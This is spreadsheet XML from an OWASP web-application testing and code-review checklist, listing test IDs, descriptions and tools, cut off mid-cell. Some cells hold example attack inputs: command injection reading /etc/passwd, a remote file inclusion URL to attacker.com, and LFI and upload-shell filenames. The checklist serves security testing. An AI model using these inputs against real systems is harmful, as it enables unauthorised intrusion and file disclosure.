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sting Checklist" sheetId="1" state="visible" r:id="rId2"/>
    <sheet name="Considerations" sheetId="2" state="visible" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName function="false" hidden="false" name="Awareness" vbProcedure="false">Considerations!$M$2:$M$6</definedName>
    <definedName function="false" hidden="false" name="EaseofExploit" vbProcedure="false">Considerations!$K$2:$K$6</definedName>
    <definedName function="false" hidden="false" name="EasyofDiscovery" vbProcedure="false">Considerations!$I$2:$I$6</definedName>
    <definedName function="false" hidden="false" name="FinancialDamage" vbProcedure="false">Considerations!$A$27:$A$31</definedName>
    <definedName function="false" hidden="false" name="IntrusionDetection" vbProcedure="false">Considerations!$A$20:$A$24</definedName>
    <definedName function="false" hidden="false" name="LossofAccountability" vbProcedure="false">Considerations!$G$10:$G$13</definedName>
    <definedName function="false" hidden="false" name="LossofAvailability" vbProcedure="false">Considerations!$E$12:$E$16</definedName>
    <definedName function="false" hidden="false" name="LossofConfidentiality" vbProcedure="false">Considerations!$A$12:$A$16</definedName>
    <definedName function="false" hidden="false" name="LossofIntegrity" vbProcedure="false">Considerations!$C$12:$C$17</definedName>
    <definedName function="false" hidden="false" name="Motive" vbProcedure="false">Considerations!$C$4:$C$7</definedName>
    <definedName function="false" hidden="false" name="NonCompliance" vbProcedure="false">Considerations!$E$27:$E$30</definedName>
    <definedName function="false" hidden="false" name="Opportunity" vbProcedure="false">Considerations!$E$4:$E$7</definedName>
    <definedName function="false" hidden="false" name="PolicyViolation" vbProcedure="false">Considerations!$C$20:$C$24</definedName>
    <definedName function="false" hidden="false" name="PopulationSize" vbProcedure="false">Considerations!$G$2:$G$7</definedName>
    <definedName function="false" hidden="false" name="ReputationDamage" vbProcedure="false">Considerations!$C$27:$C$31</definedName>
    <definedName function="false" hidden="false" name="result" vbProcedure="false">'Testing Checklist'!$A$126:$A$126</definedName>
    <definedName function="false" hidden="false" name="SkillRequired" vbProcedure="false">Considerations!$A$4:$A$9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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="522" uniqueCount="424">
  <si>
    <t xml:space="preserve">Simplified Testing Guide v4 Checklist and Code Review Guide v2.0alpha Checklist</t>
  </si>
  <si>
    <t xml:space="preserve">By Prathan Phongthiproek, Timo Pagel</t>
  </si>
  <si>
    <t xml:space="preserve">More Information: </t>
  </si>
  <si>
    <t xml:space="preserve">https://kennel209.gitbooks.io/owasp-testing-guide-v4/</t>
  </si>
  <si>
    <t xml:space="preserve">https://www.owasp.org/images/7/78/OWASP_AlphaRelease_CodeReviewGuide2.0.pdf</t>
  </si>
  <si>
    <t xml:space="preserve">Information Gathering</t>
  </si>
  <si>
    <t xml:space="preserve">Test Name</t>
  </si>
  <si>
    <t xml:space="preserve">Description</t>
  </si>
  <si>
    <t xml:space="preserve">Tools</t>
  </si>
  <si>
    <t xml:space="preserve">Done</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-002</t>
  </si>
  <si>
    <t xml:space="preserve">Fingerprint Web Server</t>
  </si>
  <si>
    <t xml:space="preserve">Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t xml:space="preserve">Httprint, Httprecon, Desenmascarame</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-003</t>
  </si>
  <si>
    <t xml:space="preserve">Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t xml:space="preserve">Analyze robots.txt and identify &lt;META&gt; Tags from website.</t>
  </si>
  <si>
    <t xml:space="preserve">Browser, curl, wget</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-004</t>
  </si>
  <si>
    <t xml:space="preserve">Enumerate Applications on Webserver</t>
  </si>
  <si>
    <t xml:space="preserve">Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers</t>
  </si>
  <si>
    <t xml:space="preserve">Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-005</t>
  </si>
  <si>
    <t xml:space="preserve">Review Webpage Comments and Metadata for Information Leakage</t>
  </si>
  <si>
    <t xml:space="preserve">Find sensitive information from webpage comments and Metadata on source code.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-006</t>
  </si>
  <si>
    <t xml:space="preserve">Identify application entry points</t>
  </si>
  <si>
    <t xml:space="preserve">Identify from hidden fields, parameters, methods HTTP header analysis</t>
  </si>
  <si>
    <t xml:space="preserve">Burp proxy, ZAP, Tamper data</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-007</t>
  </si>
  <si>
    <t xml:space="preserve">Map execution paths through application</t>
  </si>
  <si>
    <t xml:space="preserve">Map the target application and understand the principal workflows.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp proxy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-008</t>
  </si>
  <si>
    <t xml:space="preserve">Fingerprint Web Application Framework</t>
  </si>
  <si>
    <t xml:space="preserve">Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.</t>
  </si>
  <si>
    <t xml:space="preserve">Whatweb, BlindElephant, Wappalyzer</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-009</t>
  </si>
  <si>
    <t xml:space="preserve">Fingerprint Web Application</t>
  </si>
  <si>
    <t xml:space="preserve">Identify the web application and version to determine known vulnerabilities and the appropriate exploits.</t>
  </si>
  <si>
    <t xml:space="preserve">Whatweb, BlindElephant, Wappalyzer, CMSmap</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INFO-010</t>
  </si>
  <si>
    <t xml:space="preserve">Map Application Architecture</t>
  </si>
  <si>
    <t xml:space="preserve">Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t xml:space="preserve">Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-001</t>
  </si>
  <si>
    <t xml:space="preserve">Test Network/Infrastructure Configuration</t>
  </si>
  <si>
    <t xml:space="preserve">Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.</t>
  </si>
  <si>
    <t xml:space="preserve">Nessus, Iniscan, WAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-002</t>
  </si>
  <si>
    <t xml:space="preserve">Test Application Platform Configuration</t>
  </si>
  <si>
    <t xml:space="preserve">Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.</t>
  </si>
  <si>
    <t xml:space="preserve">Browser, Nikto</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-003</t>
  </si>
  <si>
    <t xml:space="preserve">Test File Extensions Handling for Sensitive Information</t>
  </si>
  <si>
    <t xml:space="preserve">Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-004</t>
  </si>
  <si>
    <t xml:space="preserve">Backup and Unreferenced Files for Sensitive Information</t>
  </si>
  <si>
    <t xml:space="preserve">Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename</t>
  </si>
  <si>
    <t xml:space="preserve">Nessus, Nikto, Wikto</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-005</t>
  </si>
  <si>
    <t xml:space="preserve">Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t xml:space="preserve">Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-006</t>
  </si>
  <si>
    <t xml:space="preserve">Test HTTP Methods</t>
  </si>
  <si>
    <t xml:space="preserve">Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t xml:space="preserve">netcat, curl</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CONFIG-tpagel</t>
  </si>
  <si>
    <t xml:space="preserve">Test for Known Vulnerabilities Server Side</t>
  </si>
  <si>
    <t xml:space="preserve">Test for dependencies with known vulnerabilities</t>
  </si>
  <si>
    <t xml:space="preserve">Sensio Labs Security Checker</t>
  </si>
  <si>
    <t xml:space="preserve">Identity Management Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-001</t>
  </si>
  <si>
    <t xml:space="preserve">Test Role Definitions</t>
  </si>
  <si>
    <t xml:space="preserve">Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-002</t>
  </si>
  <si>
    <t xml:space="preserve">Test User Registration Process</t>
  </si>
  <si>
    <t xml:space="preserve">Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t xml:space="preserve">Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t xml:space="preserve">Browser, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-005</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak or unenforced username policy</t>
  </si>
  <si>
    <t xml:space="preserve">User account names are often highly structured (e.g. Joe Bloggsaccount name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-006</t>
  </si>
  <si>
    <t xml:space="preserve">Test Permissions of Guest/Training Accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access.Evaluate consistency between access policy and guest/training account access permissions.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-IDENT-007</t>
  </si>
  <si>
    <t xml:space="preserve">Test Account Suspension/Resumption Process</t>
  </si>
  <si>
    <t xml:space="preserve">Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.</t>
  </si>
  <si>
    <t xml:space="preserve">Authentication Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t xml:space="preserve">Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for default credentials</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for default credentials of common applications, Testing for default password of new accounts.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Hydra</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak lock out mechanism</t>
  </si>
  <si>
    <t xml:space="preserve">Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t xml:space="preserve">Browser</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for bypassing authentication schema</t>
  </si>
  <si>
    <t xml:space="preserve">Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-005</t>
  </si>
  <si>
    <t xml:space="preserve">Test remember password functionality</t>
  </si>
  <si>
    <t xml:space="preserve">Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-006</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Browser cache weakness</t>
  </si>
  <si>
    <t xml:space="preserve">Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Firefox add-on CacheViewer2</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-007</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak password policy</t>
  </si>
  <si>
    <t xml:space="preserve">Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHN-009</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for weak password change or reset functionalities</t>
  </si>
  <si>
    <t xml:space="preserve">Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHZ-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing Directory traversal/file include</t>
  </si>
  <si>
    <t xml:space="preserve">dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Wfuzz, WAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHZ-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for bypassing authorization schema</t>
  </si>
  <si>
    <t xml:space="preserve">Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy (Autorize), ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHZ-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Privilege Escalation</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-AUTHZ-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t xml:space="preserve">Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-AUTHZ-01</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for password expiration</t>
  </si>
  <si>
    <t xml:space="preserve">Does application support password expiration?</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-AUTHZ-02</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for user privileges documentation</t>
  </si>
  <si>
    <t xml:space="preserve">User and role based privileges are documented</t>
  </si>
  <si>
    <t xml:space="preserve">Data Validation Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t xml:space="preserve">Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Xenotix XSS, pixy, RIPS, WAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t xml:space="preserve">Check input forms/Upload forms and analyze HTML codes</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, BeEF, XSS Proxy, pixy, RIPS, WAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for HTTP Verb Tampering</t>
  </si>
  <si>
    <t xml:space="preserve">Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization.</t>
  </si>
  <si>
    <t xml:space="preserve">netcat, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-005</t>
  </si>
  <si>
    <t xml:space="preserve">MySQL Testing</t>
  </si>
  <si>
    <t xml:space="preserve">Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t xml:space="preserve">SQLMap, Mysqloit, Power Injector, RIPS</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-007</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for ORM Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t xml:space="preserve">Hibernate, Nhibernate</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-008</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for XML Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Wfuzz, RIPS</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-011</t>
  </si>
  <si>
    <t xml:space="preserve">IMAP/SMTP Injection</t>
  </si>
  <si>
    <t xml:space="preserve">• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-012</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Code Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Liffy, Panoptic, RIPS</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Local File Inclusion</t>
  </si>
  <si>
    <t xml:space="preserve">LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource); Is open_basedir set in server configuration?</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, fimap, Liffy, RIPS</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t xml:space="preserve">RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, fimap, Liffy</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-INPVAL-013</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Command Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Commix</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-INPUTVAL-01</t>
  </si>
  <si>
    <t xml:space="preserve">Testing of Input Validation for all requests</t>
  </si>
  <si>
    <t xml:space="preserve">Does the centralized validation get applied to all requests and all the inputs?</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-INPUTVAL-02</t>
  </si>
  <si>
    <t xml:space="preserve">Testing of centralized validation check</t>
  </si>
  <si>
    <t xml:space="preserve">Does the centralized validation check block all the special characters?</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-INPUTVAL-03</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for untrusted inputs (e.g. external services)</t>
  </si>
  <si>
    <t xml:space="preserve">Are all the untrusted inputs validated?Input data is constrained and validated for type, length, format, and range.</t>
  </si>
  <si>
    <t xml:space="preserve">Session Management Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Cookies attributes</t>
  </si>
  <si>
    <t xml:space="preserve">Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Session Fixation</t>
  </si>
  <si>
    <t xml:space="preserve">The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-005</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t xml:space="preserve">URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t xml:space="preserve"> ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-SESS-006</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for logout functionality</t>
  </si>
  <si>
    <t xml:space="preserve">Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-SESS-01</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Sessions in URLs</t>
  </si>
  <si>
    <t xml:space="preserve">No session parameters are passed in URLs</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-SESS-02</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for session storage</t>
  </si>
  <si>
    <t xml:space="preserve">Session storage is secure</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-SESS-03</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for session timeouts</t>
  </si>
  <si>
    <t xml:space="preserve">Session inactivity timeouts are enforced</t>
  </si>
  <si>
    <t xml:space="preserve">Error Handling</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-ERR-001</t>
  </si>
  <si>
    <t xml:space="preserve">Analysis of Error Codes</t>
  </si>
  <si>
    <t xml:space="preserve">Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-ERR-002</t>
  </si>
  <si>
    <t xml:space="preserve">Analysis of Stack Traces</t>
  </si>
  <si>
    <t xml:space="preserve">• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syntax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t xml:space="preserve">Cryptography</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CRYPST-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection</t>
  </si>
  <si>
    <t xml:space="preserve">Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)</t>
  </si>
  <si>
    <t xml:space="preserve">testssl.sh, SSL Breacher</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CRYPST-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Sensitive information sent via unencrypted channels</t>
  </si>
  <si>
    <t xml:space="preserve">Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, Curl</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-CRYPT-01</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for resend cryptographic functions</t>
  </si>
  <si>
    <t xml:space="preserve">Are cryptographic functions used by the application the most recent version of these protocols, patched and process in place to keep them updated? (e.g. password hashes)</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for encrypted credentials</t>
  </si>
  <si>
    <t xml:space="preserve">Are database credentials stored in an encrypted format</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-CRYPT-02</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for unencrypted channels</t>
  </si>
  <si>
    <t xml:space="preserve">Is the data sent on encrypted channel? Does the application use HTTPClient for making external connections?</t>
  </si>
  <si>
    <t xml:space="preserve">Proxy</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-CRYPT-03</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for keys in code</t>
  </si>
  <si>
    <t xml:space="preserve">Keys are not held in code.</t>
  </si>
  <si>
    <t xml:space="preserve">Logging and Audit</t>
  </si>
  <si>
    <t xml:space="preserve">Result</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-LOG-01</t>
  </si>
  <si>
    <t xml:space="preserve">Test of sensitive information in logs</t>
  </si>
  <si>
    <t xml:space="preserve">Are logs logging personal information, passwords or other sensitive information?</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-LOG-02</t>
  </si>
  <si>
    <t xml:space="preserve">Test for logging of connections</t>
  </si>
  <si>
    <t xml:space="preserve">Do audit logs log connection attempts (both successful and failures)?</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-LOG-03</t>
  </si>
  <si>
    <t xml:space="preserve">Test for logs with malicious behaviors</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a process(s) in place to read audit logs for unintended/malicious behaviors?</t>
  </si>
  <si>
    <t xml:space="preserve">Business logic Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-001</t>
  </si>
  <si>
    <t xml:space="preserve">Test Business Logic Data Validation</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-002</t>
  </si>
  <si>
    <t xml:space="preserve">Test Ability to Forge Requests</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-003</t>
  </si>
  <si>
    <t xml:space="preserve">Test Integrity Checks</t>
  </si>
  <si>
    <t xml:space="preserve">•Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.
• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.
• Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-004</t>
  </si>
  <si>
    <t xml:space="preserve">Test for Process Timing</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for application/system functionality that may
be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
• Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-005</t>
  </si>
  <si>
    <t xml:space="preserve">Test Number of Times a Function
 Can be Used Limits</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.
• For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-006</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for the Circumvention of 
Work Flows</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.
• For each method develop a misuse case and try to circumvent or perform an action that is "not acceptable" per the the business logic workflow. </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-007</t>
  </si>
  <si>
    <t xml:space="preserve">Test Defenses Against Application Mis-use</t>
  </si>
  <si>
    <t xml:space="preserve">Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-008</t>
  </si>
  <si>
    <t xml:space="preserve">Test Upload of Unexpected File Types</t>
  </si>
  <si>
    <t xml:space="preserve">• Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system.
• Try to upload these “unsupported” files an verify that it are properly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. 
PS. file.phtml, shell.phPWND, SHELL~1.PHP</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-BUSLOGIC
-009</t>
  </si>
  <si>
    <t xml:space="preserve">Test Upload of Malicious Files</t>
  </si>
  <si>
    <t xml:space="preserve">• Develop or acquire a known “malicious” file.
• Try to upload the malicious file to the application/system and verify that it is correctly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. </t>
  </si>
  <si>
    <t xml:space="preserve">CODE-BUSLOG-01</t>
  </si>
  <si>
    <t xml:space="preserve">Test for system privileges</t>
  </si>
  <si>
    <t xml:space="preserve">Does the design use any elevated OS/system privileges for external connections/commands?</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-BUSLOG-02</t>
  </si>
  <si>
    <t xml:space="preserve">Test for reduced privileges</t>
  </si>
  <si>
    <t xml:space="preserve">Are privileges reduce whenever possible?</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-BUSLOG-03</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for protected classes</t>
  </si>
  <si>
    <t xml:space="preserve">Classes that contain security secrets (like passwords) are only accessible through protected API’s</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-BUSLOG-04</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for server side validation</t>
  </si>
  <si>
    <t xml:space="preserve">Data is validated on server side</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-BUSLOG-05</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for XML schema</t>
  </si>
  <si>
    <t xml:space="preserve">Is all XML input data validated against an agreed schema?</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-BUSLOG-06</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for output validation</t>
  </si>
  <si>
    <t xml:space="preserve">Is output that contains untrusted data supplied input have the correct type of encoding (URL 
